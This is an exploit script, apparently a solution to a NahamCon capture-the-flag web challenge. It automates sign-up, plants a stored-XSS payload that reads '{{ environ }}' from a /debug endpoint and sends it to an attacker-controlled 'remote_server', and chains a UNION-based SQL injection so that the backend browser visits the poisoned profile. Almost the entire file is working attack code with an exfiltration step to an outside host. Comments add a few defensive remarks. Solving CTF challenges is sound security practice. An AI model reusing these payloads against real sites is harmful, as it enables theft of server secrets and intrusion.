Context: tweet.

Challenge source.

import random
import string
import time

import requests
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support import expected_conditions as ec
from selenium.webdriver.support.ui import WebDriverWait

def random_string(length):
  """Return *length* random characters drawn from A-Z and 0-9.

  Uses ``random.choices`` rather than ``secrets``, so the result is not a
  cryptographic secret; in this script it only names a throw-away challenge
  account (username, password and a user-agent marker).
  """
  alphabet = string.ascii_uppercase + string.digits
  picked = random.choices(alphabet, k=length)
  return "".join(picked)

chall_url = "http://challenge.nahamcon.com:1337" # Change this
remote_server = "http://your.server" # Change this

# Throw-away identity for the challenge account. uAgent is reused later as the
# User-Agent of the keep-alive requests and inside the SQLi row, so it acts as
# a marker that ties the script's traffic together in the logs.
username = random_string(10)
password = random_string(10)
uAgent = random_string(10)
email = "{0}@{0}.com".format(username)

# Stored-XSS payload for the profile "about" field. Rendered unescaped, it POSTs
# `code={{ environ }}` to the app's /debug endpoint (evidently a template-
# rendering debug handler) and forwards the response to remote_server as the
# `leak` query parameter. Defensive counterpart: HTML-encode the field on
# output and keep /debug out of any deployed build.
_XSS_TEMPLATE = """"><script>fetch('/debug', {method: 'POST', headers: new Headers({'Content-Type': 'application/x-www-form-urlencoded'}), body: "code={{ environ }}"}).then(response => response.text()).then(data => fetch("%s/?leak="+encodeURIComponent(data)));</script>"""
XSS = _XSS_TEMPLATE % remote_server

options = webdriver.ChromeOptions()
# options.add_argument('--headless')
# --no-sandbox switches off Chrome's process sandbox. Acceptable on a disposable
# CTF box (it is often needed when Chrome runs as root or in a container), but
# it should not be carried into a browser that visits untrusted content.
options.add_argument('--no-sandbox')
# Tag this browser's requests with the random marker; the keep-alive requests
# at the end of the script send the same User-Agent.
options.add_argument(f"user-agent={uAgent}")

# driver = webdriver.Remote("HUB_URL", options=options)
driver = webdriver.Chrome(options=options)

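driver.get(chall_url + "/signup")

# Sign up. `find_element_by_*` was removed in Selenium 4.3; use the By-locator
# API, which the WebDriverWait calls in this file already use.
WebDriverWait(driver, 10).until(ec.element_to_be_clickable((By.ID, "usernameInput")))
driver.find_element(By.ID, "usernameInput").send_keys(username)
driver.find_element(By.ID, "emailInput").send_keys(email)
driver.find_element(By.ID, "password1Input").send_keys(password)
driver.find_element(By.ID, "password2Input").send_keys(password)
driver.find_element(By.XPATH, "//button[@type='submit']").click()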

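# Sign in with the account just created. Same Selenium 4 locator API as above;
# the trailing wait confirms the post-login page (which carries the user-agent
# form) has loaded before anything reads cookies from it.
WebDriverWait(driver, 10).until(ec.element_to_be_clickable((By.ID, "passwordInput")))
driver.find_element(By.ID, "usernameInput").send_keys(username)
driver.find_element(By.ID, "passwordInput").send_keys(password)
driver.find_element(By.ID, "submitButton").click()
WebDriverWait(driver, 10).until(ec.element_to_be_clickable((By.ID, "userAgentInput")))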

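# Retrieve the session cookie set at sign-in; it authenticates the keep-alive
# requests at the end of the script. get_cookie() returns None when the cookie
# is absent, which the original indexed straight into (an opaque TypeError);
# fail with a message that names the likely cause instead.
_auth_cookie = driver.get_cookie('auth2')
if _auth_cookie is None:
  raise RuntimeError("no 'auth2' cookie after sign-in; the login step probably failed")
session_cookie = _auth_cookie["value"]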

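# Submit the stored-XSS payload through the profile "about" field (/profile/<id>).
driver.find_element(By.XPATH, "//a[contains(@href,'profile')]").click()
WebDriverWait(driver, 10).until(ec.element_to_be_clickable((By.ID, "aboutInput")))
driver.find_element(By.ID, "aboutInput").send_keys(XSS)
# The profile ID is the last path segment of the current URL. Drop any query
# string and trailing slash first: a bare split("/")[-1] yields "" or "<id>?x=y"
# in those cases, which would corrupt both the SQLi row and the polling URL.
profile_id = driver.current_url.split("?", 1)[0].rstrip("/").rsplit("/", 1)[-1]
driver.find_element(By.XPATH, "//button[@type='submit']").click()
WebDriverWait(driver, 10).until(ec.element_to_be_clickable((By.ID, "aboutInput")))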

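# SQLi through the user-agent form. The UNION row pairs the marker user-agent
# with the URL of the profile carrying the XSS; per the original author's note
# this is what makes the challenge's backend browser visit that profile.
# Defensive counterpart: the stored user-agent must go through a parameterised
# query -- string-built SQL is what makes the UNION possible.
SQLi = """' UNION SELECT '%s', '%s' -- """ % (uAgent, f"{chall_url}/profile/{profile_id}")
driver.find_element(By.XPATH, "//span[contains(@class,'title')]").click()
WebDriverWait(driver, 10).until(ec.element_to_be_clickable((By.ID, "userAgentInput")))
driver.find_element(By.ID, "userAgentInput").send_keys(SQLi)
driver.find_element(By.XPATH, "//button[@type='submit']").click()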

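# Keep the profile page warm until the leak shows up on remote_server. The
# original loop issued back-to-back requests with no socket timeout, so it
# hammered the challenge host and a single hung connection stalled it forever;
# pause between polls, bound each request, and survive transient errors.
POLL_INTERVAL = 5     # seconds between keep-alive requests
REQUEST_TIMEOUT = 10  # seconds; bounds connect + read of each poll

try:
  while True:
    print("Making request to keep the profile cached... Check your logs!")
    try:
      resp = requests.get(
        f"{chall_url}/profile/{profile_id}",
        cookies={'auth2': session_cookie},
        headers={'User-Agent': uAgent},
        timeout=REQUEST_TIMEOUT,
      )
    except requests.RequestException as exc:
      # best-effort polling: report and retry on the next tick rather than abort
      print(f"request failed: {exc}")
    else:
      print(resp.headers)
    time.sleep(POLL_INTERVAL)
except KeyboardInterrupt:
  # Ctrl-C is the only intended way out of the loop; leave quietly instead of
  # dumping a traceback.
  print("stopping")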